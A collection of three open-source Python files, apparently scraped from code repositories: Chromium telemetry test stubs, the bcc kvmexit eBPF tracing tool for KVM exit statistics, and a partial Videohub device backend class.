self._overrides = {}
class AdbDevice(object):
def __init__(self):
self.has_root = False
self.needs_su = False
self.shell_command_handlers = {}
self.mock_content = []
self.system_properties = {}
if self.system_properties.get('ro.product.cpu.abi') == None:
self.system_properties['ro.product.cpu.abi'] = 'armeabi-v7a'
def HasRoot(self):
return self.has_root
def NeedsSU(self):
return self.needs_su
def RunShellCommand(self, args, **_kwargs):
if isinstance(args, basestring):
args = shlex.split(args)
handler = self.shell_command_handlers[args[0]]
return handler(args)
def FileExists(self, _):
return False
def ReadFile(self, device_path, as_root=False): # pylint: disable=W0613
return self.mock_content
def GetProp(self, property_name):
return self.system_properties[property_name]
def SetProp(self, property_name, property_value):
self.system_properties[property_name] = property_value
class CloudStorageModuleStub(object):
PUBLIC_BUCKET = 'chromium-telemetry'
PARTNER_BUCKET = 'chrome-partner-telemetry'
INTERNAL_BUCKET = 'chrome-telemetry'
BUCKET_ALIASES = {
'public': PUBLIC_BUCKET,
'partner': PARTNER_BUCKET,
'internal': INTERNAL_BUCKET,
}
# These are used to test for CloudStorage errors.
INTERNAL_PERMISSION = 2
PARTNER_PERMISSION = 1
PUBLIC_PERMISSION = 0
# Not logged in.
CREDENTIALS_ERROR_PERMISSION = -1
class NotFoundError(Exception):
pass
class CloudStorageError(Exception):
pass
class PermissionError(CloudStorageError):
pass
class CredentialsError(CloudStorageError):
pass
def __init__(self):
self.default_remote_paths = {CloudStorageModuleStub.INTERNAL_BUCKET:{},
CloudStorageModuleStub.PARTNER_BUCKET:{},
CloudStorageModuleStub.PUBLIC_BUCKET:{}}
self.remote_paths = self.default_remote_paths
self.local_file_hashes = {}
self.local_hash_files = {}
self.permission_level = CloudStorageModuleStub.INTERNAL_PERMISSION
self.downloaded_files = []
def SetPermissionLevelForTesting(self, permission_level):
self.permission_level = permission_level
def CheckPermissionLevelForBucket(self, bucket):
if bucket == CloudStorageModuleStub.PUBLIC_BUCKET:
return
elif (self.permission_level ==
CloudStorageModuleStub.CREDENTIALS_ERROR_PERMISSION):
raise CloudStorageModuleStub.CredentialsError()
elif bucket == CloudStorageModuleStub.PARTNER_BUCKET:
if self.permission_level < CloudStorageModuleStub.PARTNER_PERMISSION:
raise CloudStorageModuleStub.PermissionError()
elif bucket == CloudStorageModuleStub.INTERNAL_BUCKET:
if self.permission_level < CloudStorageModuleStub.INTERNAL_PERMISSION:
raise CloudStorageModuleStub.PermissionError()
elif bucket not in self.remote_paths:
raise CloudStorageModuleStub.NotFoundError()
def SetRemotePathsForTesting(self, remote_path_dict=None):
if not remote_path_dict:
self.remote_paths = self.default_remote_paths
return
self.remote_paths = remote_path_dict
def GetRemotePathsForTesting(self):
if not self.remote_paths:
self.remote_paths = self.default_remote_paths
return self.remote_paths
# Set a dictionary of data files and their "calculated" hashes.
def SetCalculatedHashesForTesting(self, calculated_hash_dictionary):
self.local_file_hashes = calculated_hash_dictionary
def GetLocalDataFiles(self):
return self.local_file_hashes.keys()
# Set a dictionary of hash files and the hashes they should contain.
def SetHashFileContentsForTesting(self, hash_file_dictionary):
self.local_hash_files = hash_file_dictionary
def GetLocalHashFiles(self):
return self.local_hash_files.keys()
def ChangeRemoteHashForTesting(self, bucket, remote_path, new_hash):
self.remote_paths[bucket][remote_path] = new_hash
def List(self, bucket):
if not bucket or not bucket in self.remote_paths:
bucket_error = ('Incorrect bucket specified, correct buckets:' +
str(self.remote_paths))
raise CloudStorageModuleStub.CloudStorageError(bucket_error)
CloudStorageModuleStub.CheckPermissionLevelForBucket(self, bucket)
return list(self.remote_paths[bucket].keys())
def Exists(self, bucket, remote_path):
CloudStorageModuleStub.CheckPermissionLevelForBucket(self, bucket)
return remote_path in self.remote_paths[bucket]
def Insert(self, bucket, remote_path, local_path):
CloudStorageModuleStub.CheckPermissionLevelForBucket(self, bucket)
if not local_path in self.GetLocalDataFiles():
file_path_error = 'Local file path does not exist'
raise CloudStorageModuleStub.CloudStorageError(file_path_error)
self.remote_paths[bucket][remote_path] = (
CloudStorageModuleStub.CalculateHash(self, local_path))
return remote_path
def GetHelper(self, bucket, remote_path, local_path, only_if_changed):
CloudStorageModuleStub.CheckPermissionLevelForBucket(self, bucket)
if not remote_path in self.remote_paths[bucket]:
if only_if_changed:
return False
raise CloudStorageModuleStub.NotFoundError('Remote file does not exist.')
remote_hash = self.remote_paths[bucket][remote_path]
local_hash = self.local_file_hashes[local_path]
if only_if_changed and remote_hash == local_hash:
return False
self.downloaded_files.append(remote_path)
self.local_file_hashes[local_path] = remote_hash
self.local_hash_files[local_path + '.sha1'] = remote_hash
return remote_hash
def Get(self, bucket, remote_path, local_path):
return CloudStorageModuleStub.GetHelper(self, bucket, remote_path,
local_path, False)
def GetIfChanged(self, local_path, bucket=None):
remote_path = os.path.basename(local_path)
if bucket:
return CloudStorageModuleStub.GetHelper(self, bucket, remote_path,
local_path, True)
result = CloudStorageModuleStub.GetHelper(
self, self.PUBLIC_BUCKET, remote_path, local_path, True)
if not result:
result = CloudStorageModuleStub.GetHelper(
self, self.PARTNER_BUCKET, remote_path, local_path, True)
if not result:
result = CloudStorageModuleStub.GetHelper(
self, self.INTERNAL_BUCKET, remote_path, local_path, True)
return result
def GetFilesInDirectoryIfChanged(self, directory, bucket):
if os.path.dirname(directory) == directory: # If in the root dir.
raise ValueError('Trying to serve root directory from HTTP server.')
for dirpath, _, filenames in os.walk(directory):
for filename in filenames:
path, extension = os.path.splitext(
os.path.join(dirpath, filename))
if extension != '.sha1':
continue
self.GetIfChanged(path, bucket)
def CalculateHash(self, file_path):
return self.local_file_hashes[file_path]
def ReadHash(self, hash_path):
return self.local_hash_files[hash_path]
class LoggingStub(object):
def __init__(self):
self.warnings = []
self.errors = []
def info(self, msg, *args):
pass
def error(self, msg, *args):
self.errors.append(msg % args)
def warning(self, msg, *args):
self.warnings.append(msg % args)
def warn(self, msg, *args):
self.warning(msg, *args)
class OpenFunctionStub(object):
class FileStub(object):
def __init__(self, data):
self._data = data
def __enter__(self):
return self
def __exit__(self, *args):
pass
def read(self, size=None):
if size:
return self._data[:size]
else:
return self._data
def write(self, data):
self._data.write(data)
def close(self):
pass
def __init__(self):
self.files = {}
def __call__(self, name, *args, **kwargs):
return OpenFunctionStub.FileStub(self.files[name])
class OsModuleStub(object):
class OsEnvironModuleStub(object):
def get(self, _):
return None
class OsPathModuleStub(object):
def __init__(self, sys_module):
self.sys = sys_module
self.files = []
self.dirs = []
def exists(self, path):
return path in self.files
def isfile(self, path):
return path in self.files
def isdir(self, path):
return path in self.dirs
def join(self, *paths):
def IsAbsolutePath(path):
if self.sys.platform.startswith('win'):
return re.match('[a-zA-Z]:\\\\', path)
else:
return path.startswith('/')
# Per Python specification, if any component is an absolute path,
# discard previous components.
for index, path in reversed(list(enumerate(paths))):
if IsAbsolutePath(path):
paths = paths[index:]
break
if self.sys.platform.startswith('win'):
tmp = os.path.join(*paths)
return tmp.replace('/', '\\')
else:
tmp = os.path.join(*paths)
return tmp.replace('\\', '/')
def basename(self, path):
if self.sys.platform.startswith('win'):
return ntpath.basename(path)
else:
return posixpath.basename(path)
@staticmethod
def abspath(path):
return os.path.abspath(path)
@staticmethod
def expanduser(path):
return os.path.expanduser(path)
@staticmethod
def dirname(path):
return os.path.dirname(path)
@staticmethod
def realpath(path):
return os.path.realpath(path)
@staticmethod
def split(path):
return os.path.split(path)
@staticmethod
def splitext(path):
return os.path.splitext(path)
@staticmethod
def splitdrive(path):
return os.path.splitdrive(path)
X_OK = os.X_OK
sep = os.sep
pathsep = os.pathsep
def __init__(self, sys_module=sys):
self.path = OsModuleStub.OsPathModuleStub(sys_module)
self.environ = OsModuleStub.OsEnvironModuleStub()
self.display = ':0'
self.local_app_data = None
self.sys_path = None
self.program_files = None
self.program_files_x86 = None
self.devnull = os.devnull
self._directory = {}
def access(self, path, _):
return path in self.path.files
def getenv(self, name, value=None):
if name == 'DISPLAY':
env = self.display
elif name == 'LOCALAPPDATA':
env = self.local_app_data
elif name == 'PATH':
env = self.sys_path
elif name == 'PROGRAMFILES':
env = self.program_files
elif name == 'PROGRAMFILES(X86)':
env = self.program_files_x86
else:
raise NotImplementedError('Unsupported getenv')
return env if env else value
def chdir(self, path):
pass
def walk(self, top):
for dir_name in self._directory:
yield top, dir_name, self._directory[dir_name]
class PerfControlModuleStub(object):
class PerfControlStub(object):
def __init__(self, adb):
pass
def __init__(self):
self.PerfControl = PerfControlModuleStub.PerfControlStub
class RawInputFunctionStub(object):
def __init__(self):
self.input = ''
def __call__(self, name, *args, **kwargs):
return self.input
class SubprocessModuleStub(object):
class PopenStub(object):
def __init__(self):
self.communicate_result = ('', '')
self.returncode_result = 0
def __call__(self, args, **kwargs):
return self
def communicate(self):
return self.communicate_result
@property
def returncode(self):
return self.returncode_result
def __init__(self):
self.Popen = SubprocessModuleStub.PopenStub()
self.PIPE = None
def call(self, *args, **kwargs):
pass
class SysModuleStub(object):
def __init__(self):
self.platform = ''
class ThermalThrottleModuleStub(object):
class ThermalThrottleStub(object):
def __init__(self, adb):
pass
def __init__(self):
self.ThermalThrottle = ThermalThrottleModuleStub.ThermalThrottleStub
class CertUtilsStub(object):
openssl_import_error = None
@staticmethod
def write_dummy_ca_cert(_ca_cert_str, _key_str, cert_path):
pass
@staticmethod
def generate_dummy_ca_cert():
return '-', '-'
class AdbInstallCertStub(object):
class AndroidCertInstaller(object):
def __init__(self, device_id, _cert_name, _cert_path):
if device_id == 'success':
pass
elif device_id == 'failure':
raise Exception('Test exception.')
def install_cert(self, overwrite_cert=False):
pass
class PlatformSettingsStub(object):
@staticmethod
def HasSniSupport():
return True
|
Bysmyyr/chromium-crosswalk
|
tools/telemetry/telemetry/testing/system_stub.py
|
Python
|
bsd-3-clause
| 14,620 | 0.011833 |
#!/usr/bin/env python
#
# kvmexit.py
#
# Display the exit_reason and its statistics of each vm exit
# for all vcpus of all virtual machines. For example:
# $./kvmexit.py
# PID TID KVM_EXIT_REASON COUNT
# 1273551 1273568 EXIT_REASON_MSR_WRITE 6
# 1274253 1274261 EXIT_REASON_EXTERNAL_INTERRUPT 1
# 1274253 1274261 EXIT_REASON_HLT 12
# ...
#
# Besides, we also allow users to specify one pid, tid(s), or one
# pid and its vcpu. See kvmexit_example.txt for more examples.
#
# @PID: each vitual machine's pid in the user space.
# @TID: the user space's thread of each vcpu of that virtual machine.
# @KVM_EXIT_REASON: the reason why the vm exits.
# @COUNT: the counts of the @KVM_EXIT_REASONS.
#
# REQUIRES: Linux 4.7+ (BPF_PROG_TYPE_TRACEPOINT support)
#
# Copyright (c) 2021 ByteDance Inc. All rights reserved.
#
# Author(s):
# Fei Li <[email protected]>
from __future__ import print_function
from time import sleep
from bcc import BPF
import argparse
import multiprocessing
import os
import subprocess
#
# Process Arguments
#
def valid_args_list(args):
args_list = args.split(",")
for arg in args_list:
try:
int(arg)
except:
raise argparse.ArgumentTypeError("must be valid integer")
return args_list
# arguments
examples = """examples:
./kvmexit # Display kvm_exit_reason and its statistics in real-time until Ctrl-C
./kvmexit 5 # Display in real-time after sleeping 5s
./kvmexit -p 3195281 # Collpase all tids for pid 3195281 with exit reasons sorted in descending order
./kvmexit -p 3195281 20 # Collpase all tids for pid 3195281 with exit reasons sorted in descending order, and display after sleeping 20s
./kvmexit -p 3195281 -v 0 # Display only vcpu0 for pid 3195281, descending sort by default
./kvmexit -p 3195281 -a # Display all tids for pid 3195281
./kvmexit -t 395490 # Display only for tid 395490 with exit reasons sorted in descending order
./kvmexit -t 395490 20 # Display only for tid 395490 with exit reasons sorted in descending order after sleeping 20s
./kvmexit -T '395490,395491' # Display for a union like {395490, 395491}
"""
parser = argparse.ArgumentParser(
description="Display kvm_exit_reason and its statistics at a timed interval",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=examples)
parser.add_argument("duration", nargs="?", default=99999999, type=int, help="show delta for next several seconds")
parser.add_argument("-p", "--pid", type=int, help="trace this PID only")
exgroup = parser.add_mutually_exclusive_group()
exgroup.add_argument("-t", "--tid", type=int, help="trace this TID only")
exgroup.add_argument("-T", "--tids", type=valid_args_list, help="trace a comma separated series of tids with no space in between")
exgroup.add_argument("-v", "--vcpu", type=int, help="trace this vcpu only")
exgroup.add_argument("-a", "--alltids", action="store_true", help="trace all tids for this pid")
args = parser.parse_args()
duration = int(args.duration)
#
# Setup BPF
#
# load BPF program
bpf_text = """
#include <linux/delay.h>
#define REASON_NUM 69
#define TGID_NUM 1024
struct exit_count {
u64 exit_ct[REASON_NUM];
};
BPF_PERCPU_ARRAY(init_value, struct exit_count, 1);
BPF_TABLE("percpu_hash", u64, struct exit_count, pcpu_kvm_stat, TGID_NUM);
struct cache_info {
u64 cache_pid_tgid;
struct exit_count cache_exit_ct;
};
BPF_PERCPU_ARRAY(pcpu_cache, struct cache_info, 1);
FUNC_ENTRY {
int cache_miss = 0;
int zero = 0;
u32 er = GET_ER;
if (er >= REASON_NUM) {
return 0;
}
u64 cur_pid_tgid = bpf_get_current_pid_tgid();
u32 tgid = cur_pid_tgid >> 32;
u32 pid = cur_pid_tgid;
if (THREAD_FILTER)
return 0;
struct exit_count *tmp_info = NULL, *initial = NULL;
struct cache_info *cache_p;
cache_p = pcpu_cache.lookup(&zero);
if (cache_p == NULL) {
return 0;
}
if (cache_p->cache_pid_tgid == cur_pid_tgid) {
//a. If the cur_pid_tgid hit this physical cpu consecutively, save it to pcpu_cache
tmp_info = &cache_p->cache_exit_ct;
} else {
//b. If another pid_tgid matches this pcpu for the last hit, OR it is the first time to hit this physical cpu.
cache_miss = 1;
// b.a Try to load the last cache struct if exists.
tmp_info = pcpu_kvm_stat.lookup(&cur_pid_tgid);
// b.b If it is the first time for the cur_pid_tgid to hit this pcpu, employ a
// per_cpu array to initialize pcpu_kvm_stat's exit_count with each exit reason's count is zero
if (tmp_info == NULL) {
initial = init_value.lookup(&zero);
if (initial == NULL) {
return 0;
}
pcpu_kvm_stat.update(&cur_pid_tgid, initial);
tmp_info = pcpu_kvm_stat.lookup(&cur_pid_tgid);
// To pass the verifier
if (tmp_info == NULL) {
return 0;
}
}
}
if (er < REASON_NUM) {
tmp_info->exit_ct[er]++;
if (cache_miss == 1) {
if (cache_p->cache_pid_tgid != 0) {
// b.*.a Let's save the last hit cache_info into kvm_stat.
pcpu_kvm_stat.update(&cache_p->cache_pid_tgid, &cache_p->cache_exit_ct);
}
// b.* As the cur_pid_tgid meets current pcpu_cache_array for the first time, save it.
cache_p->cache_pid_tgid = cur_pid_tgid;
bpf_probe_read(&cache_p->cache_exit_ct, sizeof(*tmp_info), tmp_info);
}
return 0;
}
return 0;
}
"""
# format output
exit_reasons = (
"EXCEPTION_NMI",
"EXTERNAL_INTERRUPT",
"TRIPLE_FAULT",
"INIT_SIGNAL",
"N/A",
"N/A",
"N/A",
"INTERRUPT_WINDOW",
"NMI_WINDOW",
"TASK_SWITCH",
"CPUID",
"N/A",
"HLT",
"INVD",
"INVLPG",
"RDPMC",
"RDTSC",
"N/A",
"VMCALL",
"VMCLEAR",
"VMLAUNCH",
"VMPTRLD",
"VMPTRST",
"VMREAD",
"VMRESUME",
"VMWRITE",
"VMOFF",
"VMON",
"CR_ACCESS",
"DR_ACCESS",
"IO_INSTRUCTION",
"MSR_READ",
"MSR_WRITE",
"INVALID_STATE",
"MSR_LOAD_FAIL",
"N/A",
"MWAIT_INSTRUCTION",
"MONITOR_TRAP_FLAG",
"N/A",
"MONITOR_INSTRUCTION",
"PAUSE_INSTRUCTION",
"MCE_DURING_VMENTRY",
"N/A",
"TPR_BELOW_THRESHOLD",
"APIC_ACCESS",
"EOI_INDUCED",
"GDTR_IDTR",
"LDTR_TR",
"EPT_VIOLATION",
"EPT_MISCONFIG",
"INVEPT",
"RDTSCP",
"PREEMPTION_TIMER",
"INVVPID",
"WBINVD",
"XSETBV",
"APIC_WRITE",
"RDRAND",
"INVPCID",
"VMFUNC",
"ENCLS",
"RDSEED",
"PML_FULL",
"XSAVES",
"XRSTORS",
"N/A",
"N/A",
"UMWAIT",
"TPAUSE"
)
#
# Do some checks
#
try:
# Currently, only adapte on intel architecture
cmd = "cat /proc/cpuinfo | grep vendor_id | head -n 1"
arch_info = subprocess.check_output(cmd, shell=True).strip()
if b"Intel" in arch_info:
pass
else:
raise Exception("Currently we only support Intel architecture, please do expansion if needs more.")
# Check if kvm module is loaded
if os.access("/dev/kvm", os.R_OK | os.W_OK):
pass
else:
raise Exception("Please insmod kvm module to use kvmexit tool.")
except Exception as e:
raise Exception("Failed to do precondition check, due to: %s." % e)
try:
if BPF.support_raw_tracepoint_in_module():
# Let's firstly try raw_tracepoint_in_module
func_entry = "RAW_TRACEPOINT_PROBE(kvm_exit)"
get_er = "ctx->args[0]"
else:
# If raw_tp_in_module is not supported, fall back to regular tp
func_entry = "TRACEPOINT_PROBE(kvm, kvm_exit)"
get_er = "args->exit_reason"
except Exception as e:
raise Exception("Failed to catch kvm exit reasons due to: %s" % e)
def find_tid(tgt_dir, tgt_vcpu):
for tid in os.listdir(tgt_dir):
path = tgt_dir + "/" + tid + "/comm"
fp = open(path, "r")
comm = fp.read()
if (comm.find(tgt_vcpu) != -1):
return tid
return -1
# set process/thread filter
thread_context = ""
header_format = ""
need_collapse = not args.alltids
if args.tid is not None:
thread_context = "TID %s" % args.tid
thread_filter = 'pid != %s' % args.tid
elif args.tids is not None:
thread_context = "TIDS %s" % args.tids
thread_filter = "pid != " + " && pid != ".join(args.tids)
header_format = "TIDS "
elif args.pid is not None:
thread_context = "PID %s" % args.pid
thread_filter = 'tgid != %s' % args.pid
if args.vcpu is not None:
thread_context = "PID %s VCPU %s" % (args.pid, args.vcpu)
# transfer vcpu to tid
tgt_dir = '/proc/' + str(args.pid) + '/task'
tgt_vcpu = "CPU " + str(args.vcpu)
args.tid = find_tid(tgt_dir, tgt_vcpu)
if args.tid == -1:
raise Exception("There's no v%s for PID %d." % (tgt_vcpu, args.pid))
thread_filter = 'pid != %s' % args.tid
elif args.alltids:
thread_context = "PID %s and its all threads" % args.pid
header_format = "TID "
else:
thread_context = "all threads"
thread_filter = '0'
header_format = "PID TID "
bpf_text = bpf_text.replace('THREAD_FILTER', thread_filter)
# For kernel >= 5.0, use RAW_TRACEPOINT_MODULE for performance consideration
bpf_text = bpf_text.replace('FUNC_ENTRY', func_entry)
bpf_text = bpf_text.replace('GET_ER', get_er)
b = BPF(text=bpf_text)
# header
print("Display kvm exit reasons and statistics for %s" % thread_context, end="")
if duration < 99999999:
print(" after sleeping %d secs." % duration)
else:
print("... Hit Ctrl-C to end.")
try:
sleep(duration)
except KeyboardInterrupt:
print()
# Currently, sort multiple tids in descending order is not supported.
if (args.pid or args.tid):
ct_reason = []
if args.pid:
tgid_exit = [0 for i in range(len(exit_reasons))]
# output
print("%s%-35s %s" % (header_format, "KVM_EXIT_REASON", "COUNT"))
pcpu_kvm_stat = b["pcpu_kvm_stat"]
pcpu_cache = b["pcpu_cache"]
for k, v in pcpu_kvm_stat.items():
tgid = k.value >> 32
pid = k.value & 0xffffffff
for i in range(0, len(exit_reasons)):
sum1 = 0
for inner_cpu in range(0, multiprocessing.cpu_count()):
cachePIDTGID = pcpu_cache[0][inner_cpu].cache_pid_tgid
# Take priority to check if it is in cache
if cachePIDTGID == k.value:
sum1 += pcpu_cache[0][inner_cpu].cache_exit_ct.exit_ct[i]
# If not in cache, find from kvm_stat
else:
sum1 += v[inner_cpu].exit_ct[i]
if sum1 == 0:
continue
if (args.pid and args.pid == tgid and need_collapse):
tgid_exit[i] += sum1
elif (args.tid and args.tid == pid):
ct_reason.append((sum1, i))
elif not need_collapse or args.tids:
print("%-8u %-35s %-8u" % (pid, exit_reasons[i], sum1))
else:
print("%-8u %-8u %-35s %-8u" % (tgid, pid, exit_reasons[i], sum1))
# Display only for the target tid in descending sort
if (args.tid and args.tid == pid):
ct_reason.sort(reverse=True)
for i in range(0, len(ct_reason)):
if ct_reason[i][0] == 0:
continue
print("%-35s %-8u" % (exit_reasons[ct_reason[i][1]], ct_reason[i][0]))
break
# Aggregate all tids' counts for this args.pid in descending sort
if args.pid and need_collapse:
for i in range(0, len(exit_reasons)):
ct_reason.append((tgid_exit[i], i))
ct_reason.sort(reverse=True)
for i in range(0, len(ct_reason)):
if ct_reason[i][0] == 0:
continue
print("%-35s %-8u" % (exit_reasons[ct_reason[i][1]], ct_reason[i][0]))
|
brendangregg/bcc
|
tools/kvmexit.py
|
Python
|
apache-2.0
| 12,070 | 0.002237 |
from loguru import logger
import asyncio
from typing import Optional, List, Dict, ClassVar
from pydispatch import Dispatcher, Property
from pydispatch.properties import ListProperty, DictProperty
from vidhubcontrol.common import ConnectionState, ConnectionManager
class BackendBase(Dispatcher):
"""Base class for communicating with devices
:Events:
.. function:: on_preset_added(backend: BackendBase = self, preset: Preset = preset)
This :class:`~pydispatch.dispatch.Event` is emitted
when a new :class:`Preset` has been added.
.. function:: on_preset_stored(backend: BackendBase = self, preset: Preset = preset)
This :class:`~pydispatch.dispatch.Event` is emitted
when an existing :class:`Preset` has been recorded (updated).
.. function:: on_preset_active(backend: BackendBase, preset: Preset = preset, value: bool = value)
This :class:`~pydispatch.dispatch.Event` is emitted
when an existing :class:`Preset` has determined that its stored
routing information is currently active on the switcher.
"""
device_name: str = Property()
device_model: str = Property()
"""The model name as reported by the device"""
device_id: str = Property()
"""The unique id as reported by the device"""
device_version: str = Property()
"""Firmware version reported by the device"""
connection_manager: ConnectionManager
"""Manager for the device's :class:`~.common.ConnectionState`"""
prelude_parsed: bool = Property(False)
def __init__(self, **kwargs):
self.connection_manager = ConnectionManager()
self.device_name = kwargs.get('device_name')
self.client = None
self.event_loop = kwargs.get('event_loop', asyncio.get_event_loop())
self.bind(device_id=self.on_device_id)
if self.device_id is None:
self.device_id = kwargs.get('device_id')
@property
def connection_state(self) -> ConnectionState:
"""The current :attr:`~.common.ConnectionManager.state` of the
:attr:`connection_manager`
"""
return self.connection_manager.state
@classmethod
async def create_async(cls, **kwargs):
obj = cls(**kwargs)
await obj.connect()
return obj
async def connect(self):
manager = self.connection_manager
async with manager:
if manager.state & ConnectionState.waiting != 0:
state = await manager.wait_for('connected|not_connected')
if manager.state.is_connected:
return self.client
assert ConnectionState.not_connected in manager.state
await manager.set_state('connecting')
await asyncio.sleep(0)
try:
r = await asyncio.wait_for(self.do_connect(), timeout=2)
except asyncio.TimeoutError as exc:
r = False
async with manager:
if r is False and ConnectionState.failure not in manager.state:
await manager.set_failure('unknown')
if ConnectionState.failure in manager.state:
await manager.set_state('not_connected')
else:
if self.client is not None:
self.client = r
await manager.set_state('connected')
return r
async def disconnect(self):
manager = self.connection_manager
async with manager:
if ConnectionState.not_connected in manager.state:
return
elif ConnectionState.disconnecting in manager.state:
await manager.wait_for('not_connected')
return
elif ConnectionState.connecting in manager.state:
state = await manager.wait_for('connected|not_connected')
if state == ConnectionState.not_connected:
return
assert manager.state.is_connected
await manager.set_state('disconnecting')
await asyncio.sleep(0)
await self.do_disconnect()
async with manager:
self.client = None
await manager.set_state('not_connected')
async def _catch_exception(self, e: Exception, is_error: Optional[bool] = False):
if not is_error:
logger.exception(e)
return
exc_type = e.__class__
try:
exc_info = e.args
except:
exc_info = str(e)
async with self.connection_manager as manager:
await manager.set_failure(exc_info, e)
try:
await self.do_disconnect()
finally:
self.client = None
async with self.connection_manager as manager:
await manager.set_state('not_connected')
async def do_connect(self):
raise NotImplementedError()
async def do_disconnect(self):
raise NotImplementedError()
async def get_status(self):
raise NotImplementedError()
def on_device_id(self, instance, value, **kwargs):
if value is None:
return
if self.device_name is None:
self.device_name = value
self.unbind(self.on_device_id)
class VidhubBackendBase(BackendBase):
"""Base class for Videohub devices
Attributes:
num_outputs (int): The number of outputs as reported by the switcher.
num_inputs (int): The number of inputs as reported by the switcher.
crosspoints: This represents the currently active routing of the
switcher. Each element in the ``list`` represents an output (the
zero-based index of the ``list``) with its selected index as the
value (also zero-based).
This is a :class:`pydispatch.properties.ListProperty` and can be
observed using the :meth:`~pydispatch.Dispatcher.bind` method.
output_labels: A ``list`` containing the names of each output
as reported by the switcher
This is a :class:`pydispatch.properties.ListProperty` and can be
observed using the :meth:`~pydispatch.Dispatcher.bind` method.
input_labels: A ``list`` containing the names of each input
as reported by the switcher
This is a :class:`pydispatch.properties.ListProperty` and can be
observed using the :meth:`~pydispatch.Dispatcher.bind` method.
crosspoint_control: This is similar to :attr:`~VidhubBackendBase.crosspoints`
but if modified from outside code, the crosspoint changes will be
set on the device (no method calls required).
:class:`pydispatch.properties.ListProperty`
output_label_control: This is similar to :attr:`~VidhubBackendBase.output_labels`
but if modified from outside code, the label changes will be written
to the device (no method calls required).
:class:`pydispatch.properties.ListProperty`
input_label_control: This is similar to :attr:`~VidhubBackendBase.input_labels`
but if modified from outside code, the label changes will be written
to the device (no method calls required).
:class:`pydispatch.properties.ListProperty`
presets: The currently available (stored) ``list`` of :class:`Preset`
instances
:class:`pydispatch.properties.ListProperty`
"""
crosspoints: List[int] = ListProperty()
output_labels: List[str] = ListProperty()
input_labels: List[str] = ListProperty()
crosspoint_control: List[int] = ListProperty()
output_label_control: List[str] = ListProperty()
input_label_control: List[str] = ListProperty()
presets: List['Preset'] = ListProperty()
num_outputs: int = Property(0)
num_inputs: int = Property(0)
device_type: ClassVar[str] = 'vidhub'
feedback_prop_map = {
'crosspoints':'crosspoint_control',
'input_labels':'input_label_control',
'output_labels':'output_label_control',
}
_events_ = ['on_preset_added', 'on_preset_stored', 'on_preset_active']
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.bind(
num_outputs=self.on_num_outputs,
num_inputs=self.on_num_inputs,
output_labels=self.on_prop_feedback,
input_labels=self.on_prop_feedback,
crosspoints=self.on_prop_feedback,
output_label_control=self.on_prop_control,
input_label_control=self.on_prop_control,
crosspoint_control=self.on_prop_control,
)
presets = kwargs.get('presets', [])
for pst_data in presets:
pst_data['backend'] = self
preset = Preset(**pst_data)
self.presets.append(preset)
preset.bind(
on_preset_stored=self.on_preset_stored,
active=self.on_preset_active,
)
async def set_crosspoint(self, out_idx, in_idx):
"""Set a single crosspoint on the switcher
Arguments:
out_idx (int): The output to be set (zero-based)
in_idx (int): The input to switch the output (out_idx) to (zero-based)
"""
raise NotImplementedError()
async def set_crosspoints(self, *args):
"""Set multiple crosspoints in one method call
This is useful for setting many routing changes as it reduces the number
of commands sent to the switcher.
Arguments:
*args: Any number of output/input pairs to set. These should be given
as ``tuples`` of ``(out_idx, in_idx)`` as defined in
:meth:`~BackendBase.set_crosspoint`. They can be discontinuous
and unordered.
"""
raise NotImplementedError()
async def set_output_label(self, out_idx, label):
"""Set the label (name) of an output
Arguments:
out_idx (int): The output to be set (zero-based)
label (str): The label for the output
"""
raise NotImplementedError()
async def set_output_labels(self, *args):
"""Set multiple output labels in one method call
This is useful for setting many labels as it reduces the number
of commands sent to the switcher.
Arguments:
*args: Any number of output/label pairs to set. These should be given
as ``tuples`` of ``(out_idx, label)`` as defined in
:meth:`~BackendBase.set_output_label`. They can be discontinuous
and unordered.
"""
raise NotImplementedError()
async def set_input_label(self, in_idx, label):
"""Set the label (name) of an input
Arguments:
in_idx (int): The input to be set (zero-based)
label (str): The label for the input
"""
raise NotImplementedError()
async def set_input_labels(self, *args):
"""Set multiple input labels in one method call
This is useful for setting many labels as it reduces the number
of commands sent to the switcher.
Arguments:
*args: Any number of input/label pairs to set. These should be given
as ``tuples`` of ``(in_idx, label)`` as defined in
:meth:`~BackendBase.set_input_label`. They can be discontinuous
and unordered.
"""
raise NotImplementedError()
async def add_preset(self, name=None):
"""Adds a new :class:`Preset` instance
This method is used internally and should not normally be called outside
of this module. Instead, see :meth:`~BackendBase.store_preset`
"""
index = len(self.presets)
preset = Preset(backend=self, name=name, index=index)
self.presets.append(preset)
preset.bind(
on_preset_stored=self.on_preset_stored,
active=self.on_preset_active,
)
self.emit('on_preset_added', backend=self, preset=preset)
return preset
async def store_preset(self, outputs_to_store=None, name=None, index=None, clear_current=True):
"""Store the current switcher state to a :class:`Preset`
Arguments:
outputs_to_store (optional): An iterable of the output numbers
(zero-based) that should be saved in the preset. If given, only
these outputs will be recorded and when recalled, any output
not in this argument will be unchanged. If not given or ``None``,
all outputs will be recorded.
name (optional): The name to be given to the preset. If not provided
or ``None`` the preset will be given a name based off of its index.
index (optional): The index for the preset. If given and the preset
exists in the :attr:`~BackendBase.presets` list, that preset
will be updated. If there is no preset found with the index,
a new one will be created. If not given or ``None``, the next
available index will be used and a new preset will be created.
clear_current (bool): If ``True``, any previously existing data will
be removed from the preset (if it exists). If ``False``, the
data (if existing) will be merged with the current switcher state.
Default is ``True``
Returns:
The :class:`Preset` instance that was created or updated
This method is a ``coroutine``
"""
if index is None:
preset = await self.add_preset()
else:
while True:
try:
preset = self.presets[index]
except IndexError:
preset = None
if preset is not None:
break
preset = await self.add_preset()
if name is not None:
preset.name = name
await preset.store(outputs_to_store, clear_current)
return preset
def on_preset_stored(self, *args, **kwargs):
kwargs['backend'] = self
self.emit('on_preset_stored', *args, **kwargs)
def on_preset_active(self, instance, value, **kwargs):
self.emit('on_preset_active', backend=self, preset=instance, value=value)
def on_num_outputs(self, instance, value, **kwargs):
if value == len(self.output_labels):
return
if value != len(self.crosspoints):
self.crosspoints = [0] * value
self.output_labels = [''] * value
def on_num_inputs(self, instance, value, **kwargs):
if value == len(self.input_labels):
return
if value != len(self.crosspoints):
self.crosspoints = [0] * value
self.input_labels = [''] * value
def on_prop_feedback(self, instance, value, **kwargs):
prop = kwargs.get('property')
if prop.name not in self.feedback_prop_map:
return
elock = self.emission_lock(prop.name)
control_prop = self.feedback_prop_map[prop.name]
setattr(self, control_prop, value[:])
def on_prop_control(self, instance, value, **kwargs):
if not self.prelude_parsed or not self.connection_state.is_connected:
return
